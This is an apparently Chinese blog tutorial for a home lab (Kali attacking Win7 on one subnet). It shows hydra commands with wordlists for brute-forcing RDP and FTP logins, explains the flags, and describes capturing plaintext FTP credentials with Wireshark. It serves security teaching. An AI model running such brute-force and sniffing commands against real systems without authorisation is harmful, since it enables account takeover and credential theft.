rdp、ftp协议的密码爆破

远程桌面 rdp协议 3389

文件传输 FTP协议 20 21

攻击方:Kali

测试方:Win7

两台都要在同一网段

rdp、ftp协议的密码爆破_第1张图片

密码爆破工具 hydra九头蛇

hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。

爆破远程桌面

# hydra -l 某个用户名 -P 密码字典.txt rdp://192.168.241.130 -Vv
hydra -l zs -P top1000.txt rdp://192.168.241.130 -Vv

# hydra -L 用户名字典.txt -P 密码字典.txt   rdp://192.168.241.130 -Vv
# hydra -L 用户字典.txt -p 单个字典  rdp://192.168.241.130 -Vv

# 参数
-l  用户名
-L 用户名字典.txt
-P 密码字典.txt
-p 单个密码
-Vv 显示爆破过程

爆破ftp服务器密码

hydra -l zs -P top1000.txt ftp://192.168.241.130 -Vv

wireshark抓包

先打开wireshark,开始抓包,然后在ftp客户端连接ftp服务端的那一刻,wireshark抓到包,过滤出ftp协议的包

rdp、ftp协议的密码爆破_第2张图片
FTP是一种用于在网络上传输文件的标准协议。它允许用户通过使用FTP客户端和FTP服务器之间建立的连接来上传和下载文件。FTP可以在匿名或经过身份验证的方式下使用,支持对文件和目录进行管理,包括创建、删除、重命名等操作。
然而,FTP是基于明文传输的,存在安全风险,因为用户名、密码和数据都以明文形式传输,所以使用FTP时需要谨慎处理敏感信息。

你可能感兴趣的:(网络安全,网络安全,ftp,rdp)